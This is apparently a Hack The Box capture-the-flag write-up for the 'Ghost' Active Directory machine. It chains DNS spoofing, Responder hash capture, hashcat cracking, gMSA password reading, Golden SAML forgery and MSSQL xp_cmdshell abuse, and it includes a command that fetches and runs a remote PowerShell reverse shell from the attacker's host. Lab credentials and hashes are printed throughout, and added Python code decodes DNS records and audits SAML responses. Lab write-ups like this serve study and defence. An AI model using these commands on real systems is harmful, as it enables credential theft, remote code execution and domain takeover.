DNSChef config:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ dnschef --fakeip 10.129.231.105 --interface 127.0.0.1
/usr/bin/dnschef:453: SyntaxWarning: invalid escape sequence '\/'
header += " / _` | '_ \/ __|/ __| '_ \ / _ \ _|\n"
/usr/bin/dnschef:454: SyntaxWarning: invalid escape sequence '\_'
header += " | (_| | | | \__ \ (__| | | | __/ | \n"
/usr/bin/dnschef:455: SyntaxWarning: invalid escape sequence '\_'
header += " \__,_|_| |_|___/\___|_| |_|\___|_| \n"
_ _ __
| | version 0.4 | | / _|
__| |_ __ ___ ___| |__ ___| |_
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
| (_| | | | \__ \ (__| | | | __/ |
\__,_|_| |_|___/\___|_| |_|\___|_|
iphelix@thesprawl.org

(18:49:35) [*] DNSChef started on interface: 127.0.0.1
(18:49:35) [*] Using the following nameservers: 8.8.8.8
(18:49:35) [*] Cooking all A replies to point to 10.129.231.105
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb.localdomain
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb.localdomain
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: cooking the response of type 'A' for dc01.ghost.htb to 10.129.231.105
(18:50:34) [*] 127.0.0.1: cooking the response of type 'A' for dc01.ghost.htb to 10.129.231.105
(18:50:42) [*] 127.0.0.1: cooking the response of type 'A' for linux-dev-ws01.ghost.htb to 10.129.231.105
(18:50:42) [*] 127.0.0.1: cooking the response of type 'A' for DC01.ghost.htb to 10.129.231.105

BloodHound:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ bloodhound-python -u 'florence.ramirez' -k -ns 127.0.0.1 -d ghost.htb -dc dc01.ghost.htb -c all --zip --use-ldap
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
Password:
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 16 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: linux-dev-ws01.ghost.htb
INFO: Querying computer: DC01.ghost.htb
INFO: Ignoring host linux-dev-ws01.ghost.htb since its hostname does not match: Supplied hostname linux-dev-ws01.ghost.htb does not match reported hostnames dc01 or dc01.ghost.htb
INFO: Done in 00M 33S
INFO: Compressing output into 20250403185019_bloodhound.zip

Two notes on that run. bloodhound-python still prompted for a password despite -k; I entered the LDAP bind password He!KA9oKVT3rL99j from the container's environment, but the TGT in the cache is what actually authenticates (-no-pass skips the prompt). And linux-dev-ws01 being ignored is expected, since dnschef resolves every A record to the DC.
Going through the graph I was running out of ideas, until I remembered a discussion I had seen earlier on the forum:

DNS Forum Discussion

The thread says DNS is not configured for Bitbucket yet, and that Justin (justin.bradley) is running a script against it. In an AD-integrated DNS zone, any authenticated user can by default create new records, so as florence.ramirez we can add an A record for bitbucket.ghost.htb pointing at our machine: DNS spoofing through ADIDNS. When Justin's script next requests the site it reaches a Responder HTTP server that demands NTLM authentication, and the client hands over a NetNTLMv2 response we can crack offline.
We add the record with bloodyAD, authenticating with our Kerberos ccache:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ python3 bloodyAD/bloodyAD.py -v INFO -u 'florence.ramirez' -d 'ghost.htb' -k --dc-ip 10.129.231.105 --host dc01.ghost.htb add dnsRecord bitbucket 10.10.16.25
[+] bitbucket has been successfully added

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ python3 bloodyAD/bloodyAD.py -v INFO -u 'florence.ramirez' -d 'ghost.htb' -k --dc-ip 10.129.231.105 --host dc01.ghost.htb add dnsRecord bitbucket 10.10.16.25
[b'\x04\x00\x01\x00\x05\xf0\x00\x00\xf7\x00\x00\x00\x00\x00\x01,\x00\x00\x00\x00\x00\x00\x00\x00\n\n\x10\x19', b'\x04\x00\x01\x00\x05\xf0\x00\x00\xf7\x00\x00\x00\x00\x00\x01,\x00\x00\x00\x00\x00\x00\x00\x00\n\n\x10\x19']
Traceback (most recent call last):
File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD.py", line 5, in <module>
main.main()
File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD/main.py", line 210, in main
output = args.func(conn, **params)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD/cli_modules/add.py", line 196, in dnsRecord
conn.ldap.bloodymodify(
File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD/network/ldap.py", line 301, in bloodymodify
raise err
msldap.commons.exceptions.LDAPModifyException: LDAP Modify operation failed on DN DC=bitbucket,DC=ghost.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=ghost,DC=htb! Result code: "attributeOrValueExists" Reason: "b'00002083: AtrErr: DSID-03151E7F, #1:\n\t0: 00002083: DSID-03151E7F, problem 1006 (ATT_OR_VALUE_EXISTS), data 0, Att 9017e (dnsRecord)\n\x00'"
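
What that error is telling us can be read straight off the bytes bloodyAD printed: the value is an MS-DNSP DNS_RPC_RECORD, the structure AD stores in the dnsRecord attribute of the DC=bitbucket node. The parser and builder below are an added example, not bloodyAD's code; the sample blob is copied from the output above, and the round-trip shows that the record already stored was exactly the one we asked for again (type A, TTL 300, 10.10.16.25), which is why the second add was rejected.

```python
import ipaddress
import struct

# The dnsRecord value bloodyAD printed when the second add failed (copied from the output
# above). Layout: MS-DNSP DNS_RPC_RECORD, a 24-byte header followed by the record data.
EXISTING_RECORD = (
    b"\x04\x00\x01\x00\x05\xf0\x00\x00\xf7\x00\x00\x00\x00\x00\x01,"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\n\n\x10\x19"
)

DNS_TYPE_A = 1
RANK_ZONE = 0xF0  # the record is authoritative zone data (not glue or cached)
# DataLength, Type, Version, Rank, Flags, Serial are little-endian. TtlSeconds is the
# odd one out and is big-endian; Reserved and TimeStamp (0 = static, never aged) follow.
_HEADER = struct.Struct("<HHBBHI")  # the first 12 bytes


def parse_dns_rpc_record(blob: bytes) -> dict:
    """Decode one dnsRecord value. Only A records get a decoded address; other types
    keep their raw data so the caller can still see type, TTL and serial."""
    if len(blob) < 24:
        raise ValueError("dnsRecord too short for a DNS_RPC_RECORD header")
    data_len, rtype, version, rank, flags, serial = _HEADER.unpack_from(blob, 0)
    (ttl,) = struct.unpack_from(">I", blob, 12)
    reserved, timestamp = struct.unpack_from("<II", blob, 16)
    data = blob[24:24 + data_len]
    if len(data) != data_len:
        raise ValueError("dnsRecord data truncated")
    record = {
        "type": rtype, "version": version, "rank": rank, "flags": flags,
        "serial": serial, "ttl": ttl, "reserved": reserved,
        "timestamp": timestamp, "data": data,
    }
    if rtype == DNS_TYPE_A and data_len == 4:
        record["address"] = str(ipaddress.IPv4Address(data))
    return record


def build_a_record(address: str, serial: int, ttl: int = 300, rank: int = RANK_ZONE) -> bytes:
    """Encode an A record the way a tool writes it into dnsRecord. `serial` is the value
    stored alongside the record (tools take it from the zone); the TTL default is the
    300 s seen in the captured record."""
    data = ipaddress.IPv4Address(address).packed
    return (
        _HEADER.pack(len(data), DNS_TYPE_A, 5, rank, 0, serial)
        + struct.pack(">I", ttl)
        + struct.pack("<II", 0, 0)  # Reserved, TimeStamp = 0 (static record)
        + data
    )


def describe(blob: bytes) -> str:
    """One-line summary, handy when dumping a whole zone's dnsRecord values."""
    r = parse_dns_rpc_record(blob)
    kind = {1: "A"}.get(r["type"], f"type{r['type']}")
    return f"{kind} {r.get('address', r['data'].hex())} ttl={r['ttl']} serial={r['serial']}"


if __name__ == "__main__":
    print(describe(EXISTING_RECORD))  # A 10.10.16.25 ttl=300 serial=247
```

Two things follow from the decode. Spotting a fresh A record for a name that should not exist yet, with a TimeStamp of 0, is also what a defender would look for in the zone; and because the add only needs CreateChild on the zone, the fix on the blue side is to tighten that default ACL rather than to trust that nobody knows the trick.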

The first add succeeds; the second fails with attributeOrValueExists because the record is already there (the dnsRecord value bloodyAD prints is the existing A record for 10.10.16.25). Meanwhile, Responder has been listening on tun0:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ sudo responder -I tun0 -v
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.25]
Responder IPv6 [dead:beef:4::1017]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-J9N6LZMTXL3]
Responder Domain Name [L834.LOCAL]
Responder DCE-RPC Port [46909]

[+] Listening for events...

[HTTP] Sending NTLM authentication request to 10.129.231.105
[HTTP] GET request from: ::ffff:10.129.231.105 URL: /
[HTTP] NTLMv2 Client : 10.129.231.105
[HTTP] NTLMv2 Username : ghost\justin.bradley
[HTTP] NTLMv2 Hash : justin.bradley::ghost:4e13a224dcde8a9d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

AND IT WORKED!!

Justin's script authenticated to Responder's HTTP server and we captured his NetNTLMv2 response. Let's crack it with hashcat (mode 5600, rockyou):

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 4800H with Radeon Graphics, 2212/4489 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

JUSTIN.BRADLEY::ghost:4e13a224dcde8a9d:de140dc10fdd8db5b34373e9882173f6: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:Qwertyuiop1234$$

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JUSTIN.BRADLEY::ghost:4e13a224dcde8a9d:de140dc10fdd...000000
Time.Started.....: Thu Apr 3 20:27:59 2025 (12 secs)
Time.Estimated...: Thu Apr 3 20:28:11 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 874.8 kH/s (1.18ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10711040/14344385 (74.67%)
Rejected.........: 0/10711040 (0.00%)
Restore.Point....: 10708992/14344385 (74.66%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: R302521 -> Quemierda
Hardware.Mon.#1..: Util: 62%

Started: Thu Apr 3 20:27:58 2025
Stopped: Thu Apr 3 20:28:13 2025

JUSTIN.BRADLEY:Qwertyuiop1234$$

Let’s try logging in with evil-winrm using this password (which works if the user is a member of the Remote Management Users group):

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ evil-winrm -i dc01.ghost.htb -u JUSTIN.BRADLEY -p 'Qwertyuiop1234$$'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\justin.bradley\desktop> cat user.txt
550cea959f87ff4619c672b815a18faf
*Evil-WinRM* PS C:\Users\justin.bradley\desktop>

And we got our user flag!

Privilege Escalation - ADFS abuse to RCE

ReadGMSAPassword abuse => access to adfs_gmsa$ account

Checking BloodHound, we can see that justin.bradley can read gMSA passwords:

ReadGMSAPassword

We can read it directly this way:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ netexec ldap 10.129.231.105 -u justin.bradley -p 'Qwertyuiop1234$$' --gmsa
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB 10.129.231.105 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.231.105 636 DC01 [+] ghost.htb\justin.bradley:Qwertyuiop1234$$
LDAPS 10.129.231.105 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.231.105 636 DC01 Account: adfs_gmsa$ NTLM: 9de4d086a1443bef82340604766d69c9

We can now log in using that hash:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ evil-winrm -i dc01.ghost.htb -u adfs_gmsa$ -H 9de4d086a1443bef82340604766d69c9

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> whoami
ghost\adfs_gmsa$
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents>

Golden SAML attack

Golden SAML is a post-exploitation attack technique that allows an attacker to impersonate any user, including domain admins, by forging SAML authentication tokens. It is commonly used against Active Directory Federation Services (ADFS) environments.

First we need to extract the ADFS token-signing certificate. For that we can run ADFSDump.exe as our recently compromised account:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ evil-winrm -i dc01.ghost.htb -u adfs_gmsa$ -H 9de4d086a1443bef82340604766d69c9

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload ADFSDump.exe

Info: Uploading /home/kali/Hackthebox/GHost/ADFSDump.exe to C:\Users\adfs_gmsa$\Documents\ADFSDump.exe

Data: 40276 bytes of 40276 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> ./ADFSDump.exe
___ ____ ___________ ____
/ | / __ \/ ____/ ___// __ \__ ______ ___ ____
/ /| | / / / / /_ \__ \/ / / / / / / __ `__ \/ __ \
/ ___ |/ /_/ / __/ ___/ / /_/ / /_/ / / / / / / /_/ /
/_/ |_/_____/_/ /____/_____/\__,_/_/ /_/ /_/ .___/
/_/
Created by @doughsec


## Extracting Private Key from Active Directory Store
[-] Domain is ghost.htb
[-] Private Key: FA-DB-3A-06-DD-CD-40-57-DD-41-7D-81-07-A0-F4-B3-14-FA-2B-6B-70-BB-BB-F5-28-A7-21-29-61-CB-21-C7


[-] Private Key: 8D-AC-A4-90-70-2B-3F-D6-08-D5-BC-35-A9-84-87-56-D2-FA-3B-7B-74-13-A3-C6-2C-58-A6-F4-58-FB-9D-A1


## Reading Encrypted Signing Key from Database
[-] Encrypted Token Signing Key Begin
[-] Encrypted Token Signing Key End

[-] Certificate value: 0818F900456D4642F29C6C88D26A59E5A7749EBC
[-] Store location value: CurrentUser
[-] Store name value: My

## Reading The Issuer Identifier
[-] Issuer Identifier: http://federation.ghost.htb/adfs/services/trust
[-] Detected AD FS 2019
[-] Uncharted territory! This might not work...
## Reading Relying Party Trust Information from Database
[-]
core.ghost.htb
==================
Enabled: True
Sign-In Protocol: SAML 2.0
Sign-In Endpoint: https://core.ghost.htb:8443/adfs/saml/postResponse
Signature Algorithm: http://www.w3.org/2001/04/xmldsig-more#rsa-sha256
SamlResponseSignatureType: 1;
Identifier: https://core.ghost.htb:8443
Access Policy: <PolicyMetadata xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2012/04/ADFS">
<RequireFreshAuthentication>false</RequireFreshAuthentication>
<IssuanceAuthorizationRules>
<Rule>
<Conditions>
<Condition i:type="AlwaysCondition">
<Operator>IsPresent</Operator>
</Condition>
</Conditions>
</Rule>
</IssuanceAuthorizationRules>
</PolicyMetadata>


Access Policy Parameter:

Issuance Rules: @RuleTemplate = "LdapClaims"
@RuleName = "LdapClaims"
c:[Type == "http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname", Issuer == "AD AUTHORITY"]
=> issue(store = "Active Directory", types = ("http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn", "http://schemas.xmlsoap.org/claims/CommonName"), query = ";userPrincipalName,sAMAccountName;{0}", param = c.Value);


*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents>

What we have so far is only the encrypted PFX alongside the key. We now copy out the private key and the encrypted token-signing key and convert them into binary form for later use.

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ echo '8D-AC-A4-90-70-2B-3F-D6-08-D5-BC-35-A9-84-87-56-D2-FA-3B-7B-74-13-A3-C6-2C-58-A6-F4-58-FB-9D-A1' > private.txt

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ echo '...' > token-signing-key.txt

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ cat token-signing-key.txt | base64 -d > TSK.bin

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ cat private.txt | tr -d "-" | xxd -r -p > private.bin

Now we can forge our Golden SAML token using the ADFSpoof tool:

┌──(kali㉿kali)-[~/Hackthebox/GHost/ADFSpoof]
└─$ python3 ADFSpoof.py -b TSK.bin private.bin -s 'core.ghost.htb' saml2 --endpoint 'https://core.ghost.htb:8443/adfs/saml/postResponse' --nameidformat 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' --nameid 'Administrator@ghost.htb' --rpidentifier 'https://core.ghost.htb:8443' --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>Administrator@ghost.htb</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'
___ ____ ___________ ____
/ | / __ \/ ____/ ___/____ ____ ____ / __/
/ /| | / / / / /_ \__ \/ __ \/ __ \/ __ \/ /_
/ ___ |/ /_/ / __/ ___/ / /_/ / /_/ / /_/ / __/
/_/ |_/_____/_/ /____/ .___/\____/\____/_/
/_/

A tool to for AD FS security tokens
Created by @doughsec

/home/kali/Hackthebox/GHost/ADFSpoof/ADFSpoof.py:96: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.utcnow()
[... base64-encoded SAMLResponse output omitted ...]

NOTE: I ran into a LOT of issues when trying to run ADFSpoof because of package and dependency issues, especially with the lxml, signxml and cryptography libraries. I referred to this Stack Overflow discussion for help.

Now we can use our Golden SAML token to bypass authentication on the http://core.ghost.htb:8443/ subdomain discovered during our initial recon:

ADFS

Now we add the application/x-www-form-urlencoded Content-Type header alongside our SAMLResponse value, and we get the link to our federation login:

ADFS

And now we have a valid login using our crafted Golden SAML token. All we have to do is right-click the request in Burp Suite, choose Request in browser => In original session, and we’ll be logged in:

ADFS
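From the defender's side, the following is an added example (my own code, not the writeup's or ADFS/ADFSpoof's) of the checks a relying party such as core.ghost.htb can still run on an incoming SAMLResponse: a Golden SAML token is signed with the genuine token-signing key, so the remaining signals are the pinned issuer, audience, recipient and lifetime, and whether the federation service actually recorded issuing that assertion ID. The issued-ID set, the 10-minute lifetime policy and both sample responses are constructed.

```python
"""Relying-party-side audit of an incoming SAML 2.0 Response.

Added example, not code from the writeup or from ADFS/ADFSpoof. The issued-ID
set is a constructed stand-in for the federation service's issuance log.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

# Values core.ghost.htb should pin: issuer, audience and endpoint come from the
# ADFSDump output in the writeup; the 10-minute lifetime cap is an assumed policy.
EXPECTED_ISSUER = "http://federation.ghost.htb/adfs/services/trust"
EXPECTED_AUDIENCE = "https://core.ghost.htb:8443"
EXPECTED_RECIPIENT = "https://core.ghost.htb:8443/adfs/saml/postResponse"
MAX_LIFETIME = timedelta(minutes=10)


def _ts(value):
    """Parse a SAML UTC timestamp such as 2025-04-04T09:04:58.000Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def audit_saml_response(xml_text, now, issued_ids):
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    assertion = ET.fromstring(xml_text).find("saml:Assertion", NS)
    if assertion is None:
        return ["no Assertion element"]
    issuer = assertion.findtext("saml:Issuer", default="", namespaces=NS).strip()
    if issuer != EXPECTED_ISSUER:
        findings.append(f"issuer mismatch: {issuer}")
    cond = assertion.find("saml:Conditions", NS)
    if cond is None:
        findings.append("missing Conditions")
    else:
        nb, na = _ts(cond.get("NotBefore")), _ts(cond.get("NotOnOrAfter"))
        if not nb <= now < na:
            findings.append("assertion outside its validity window")
        if na - nb > MAX_LIFETIME:
            findings.append(f"validity window too long: {na - nb}")
        aud = cond.findtext("saml:AudienceRestriction/saml:Audience", default="", namespaces=NS)
        if aud != EXPECTED_AUDIENCE:
            findings.append(f"audience mismatch: {aud}")
    scd = assertion.find("saml:Subject/saml:SubjectConfirmation/saml:SubjectConfirmationData", NS)
    if scd is None or scd.get("Recipient") != EXPECTED_RECIPIENT:
        findings.append("recipient mismatch")
    # A real RP verifies the XML-DSig with its SAML library; a Golden SAML token
    # passes that check because it carries a genuine signature, so only presence
    # is required here.
    if assertion.find("ds:Signature", NS) is None:
        findings.append("assertion not signed")
    # The one signal the forger cannot produce: a matching issuance on the ADFS side.
    if assertion.get("ID") not in issued_ids:
        findings.append(f"assertion {assertion.get('ID')} was never issued by the federation service")
    return findings


def build_response(issuer, assertion_id, not_before, not_on_or_after):
    """Constructed minimal Response in the shape ADFSpoof emits (signature element is a stub)."""
    return f"""<samlp:Response xmlns:samlp="{NS['samlp']}" Version="2.0" ID="_R1" Destination="{EXPECTED_RECIPIENT}">
  <Assertion xmlns="{NS['saml']}" ID="{assertion_id}" Version="2.0" IssueInstant="{not_before}">
    <Issuer>{issuer}</Issuer>
    <ds:Signature xmlns:ds="{NS['ds']}"><ds:SignedInfo/></ds:Signature>
    <Subject>
      <NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">Administrator@ghost.htb</NameID>
      <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
        <SubjectConfirmationData NotOnOrAfter="{not_on_or_after}" Recipient="{EXPECTED_RECIPIENT}"/>
      </SubjectConfirmation>
    </Subject>
    <Conditions NotBefore="{not_before}" NotOnOrAfter="{not_on_or_after}">
      <AudienceRestriction><Audience>{EXPECTED_AUDIENCE}</Audience></AudienceRestriction>
    </Conditions>
  </Assertion>
</samlp:Response>"""


# Constructed data: one legitimate assertion present in the issuance log, and a
# forged one with a one-hour lifetime and a wrong issuer that ADFS never issued.
ISSUED_IDS = {"_LEGIT01"}
NOW = datetime(2025, 4, 4, 9, 5, 0, tzinfo=timezone.utc)
LEGIT = build_response(EXPECTED_ISSUER, "_LEGIT01", "2025-04-04T09:04:58.000Z", "2025-04-04T09:09:58.000Z")
FORGED = build_response("http://core.ghost.htb/adfs/services/trust", "_FORGED01",
                        "2025-04-04T09:04:58.000Z", "2025-04-04T10:04:58.000Z")

if __name__ == "__main__":
    for label, resp in (("legit", LEGIT), ("forged", FORGED)):
        print(label, audit_saml_response(resp, NOW, ISSUED_IDS) or ["clean"])
```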

MSSQL Command injection

We can see that we can execute SQL queries:

MSSQL

So I immediately went ahead and tested the usual MSSQL command injection by trying to enable xp_cmdshell (I spoke about this in a previous writeup):

EXECUTE('EXECUTE AS LOGIN = ''sa'' EXEC SP_CONFIGURE ''show advanced options'', 1;reconfigure;EXEC SP_CONFIGURE ''xp_cmdshell'' , 1;reconfigure;exec xp_cmdshell ''whoami''') AT "PRIMARY"

MSSQL

So I tried to get a reverse shell using the Invoke-PowershellTCP.ps1 reverse shell script:

EXECUTE('EXECUTE AS LOGIN = ''sa'' EXEC SP_CONFIGURE ''show advanced options'', 1;reconfigure;EXEC SP_CONFIGURE ''xp_cmdshell'' , 1;reconfigure;exec xp_cmdshell ''powershell -c iex (iwr 10.10.16.25/shell.ps1 -usebasicparsing)''') AT "PRIMARY"


And we’re in:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.231.105] 49844
Windows PowerShell running as user MSSQLSERVER on PRIMARY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt service\mssqlserver

Checking our privileges, we can see that SeImpersonatePrivilege is enabled, which allows a process to impersonate another user or process:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32>

We can abuse that using EfsPotato. We can quickly compile it on the target system with this command:

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

Now run it:

PS C:\temp> ./efs.exe 'whoami'
